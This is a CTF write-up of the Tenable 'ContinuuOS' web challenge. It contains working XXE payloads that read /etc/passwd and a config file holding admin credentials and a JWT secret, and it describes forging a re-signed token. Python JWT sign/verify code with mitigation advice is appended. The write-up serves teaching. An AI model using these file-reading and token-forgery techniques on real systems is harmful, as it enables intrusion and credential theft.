IT and security stuff

Tenable CTF – ContinuuOS writeup

I had time to do a couple of challenges for this event. This one was the one I enjoyed the most, and since it involves two different techniques (XXE and JWT forgery), I decided to write it up. Enjoy!

The flag is the SSH key for user operations.

ContinuuOS is a web application running under Apache 2.4.52.

We are greeted with a login prompt. Let’s try it!
Looking at the POST request made when trying the login, we see the credentials are sent as XML. The response also returns a lot of information, maybe too much. Let's send this request to Burp Repeater and see if we can break something.
Adding a "&" to the input returns a parser error, which tells us the server parses our raw input as XML. This is a clear sign of XXE. Let's try reading some local files on the server.
Awesome! It works as intended:
<?xml version='1.0'?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<document>
<user>&xxe;</user>
<pass>test</pass>
</document>

Maybe we can get the flag this way?

Unfortunately not…

Let’s try the XML config file!

<?xml version='1.0'?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/html/conf.xml" >]>
<document>
<user>&xxe;</user>
<pass>test</pass>
</document>

OK, this is interesting. By reading the conf.xml file we get a few elements, such as credentials and a "secret". Let's try these to log into the app:

  • admin
  • Continu321!
  • 455b114503f70382f3ccd427ef45972cd2d35c41ee5abb2173d67d3ec54814f2
Once logged in as admin, we see the Operations window, which allows us to run commands and read logs on the server. Due to recent attacks, the Run Command feature has been disabled, and only the operations log is available. Let's see what this is all about!

Clicking the Submit button on Run Command does not do anything, as it was deactivated. Let’s try the Read Log feature.

Not much useful information here. Let's look at the request that was made.
We see something unusual here: the POST request sends not only a JWT cookie but also a second JWT token in the body. Let's decode it and see what is going on.
OK, good: we can see how the ReadLog operation is processed (the operation and its target are claims inside the token). Maybe we can get the flag this way?
Nope! It returns a 400 Bad Request. What am I missing here?

After a couple of minutes, I realised I had forgotten to sign the modified token with the secret key that was found in the conf.xml file.

Got it!
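As an added illustration (not code from the challenge or its authors), here is a minimal HS256 issue/verify pair using only Python's standard library. It shows why a token with altered claims gets rejected (the 400 above) until it is re-signed with the server's secret, and therefore why that secret leaking from conf.xml defeats the whole control. The secret value and the claim names are constructed assumptions.

```python
import base64
import hashlib
import hmac
import json

# Constructed placeholder standing in for the secret leaked from conf.xml.
LEAKED_SECRET = "example-secret-from-conf.xml"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, secret: str) -> str:
    """Issue an HS256 JWT: base64url(header).base64url(claims).base64url(HMAC)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_jwt(token: str, secret: str):
    """Return the claims if the signature is valid under `secret`, else None."""
    try:
        header, body, sig = token.split(".")
        alg = json.loads(_b64url_decode(header)).get("alg")
    except (ValueError, UnicodeDecodeError):
        return None
    # Pin the algorithm server-side; never let the token choose "none" or another alg.
    if alg != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    # Constant-time comparison so the check does not leak timing information.
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        return None
    return json.loads(_b64url_decode(body))


def replace_claims_keep_signature(token: str, new_claims: dict) -> str:
    """Test fixture: swap the claims but keep the old signature (what a naive edit does)."""
    header, _, sig = token.split(".")
    body = _b64url(json.dumps(new_claims, separators=(",", ":")).encode())
    return f"{header}.{body}.{sig}"
```

The mitigation follows directly: keep the signing secret out of any file the web application can be made to read, and rotate it once it has been exposed.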
